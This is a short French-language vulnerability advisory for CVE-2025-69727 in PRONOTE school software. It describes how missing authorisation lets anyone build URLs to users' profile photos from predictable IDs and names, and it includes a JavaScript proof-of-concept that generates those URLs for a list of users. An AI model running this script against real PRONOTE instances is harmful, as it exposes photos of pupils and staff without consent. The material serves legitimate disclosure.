
CVE-2025-69727
PRONOTE - 202X.X.X < 2025.2.8
Une vulnérabilité de contrôle d'accès incorrect existe dans INDEX-EDUCATION PRONOTE avant la version 2025.2.8. Les composants affectés (composeUrlImgPhotoIndividu) permettent la construction d'URLs directes vers les images de profil des utilisateurs en se basant uniquement sur des identifiants prévisibles tels que les ID utilisateurs et les noms. En raison de l'absence de vérifications d'autorisation et de l'absence de limitation de débit lors de la génération ou de l'accès à ces URLs, un acteur non authentifié ou non autorisé peut récupérer les photos de profil des utilisateurs en élaborant des requêtes avec des identifiants devinés ou connus.
const arr = [] // List of users
const base = "https://demo.index-education.net/pronote";
IE.fModule({
f: function (exports, require, module, global) {
const ObjetElement = require("ObjetElement");
const AccesApp = global.GApplication;
const comm = AccesApp.communication;
for (const obj of arr) {
const path = comm.composeUrlFichierExterne(
obj.L.replace(/[\s]/gi, "_") + ".jpg",
new ObjetElement.ObjetElement("", obj.N)
);
const url = `${base}/${path}`;
console.log(url);
}
},
fn: "testIEmodule.js",
});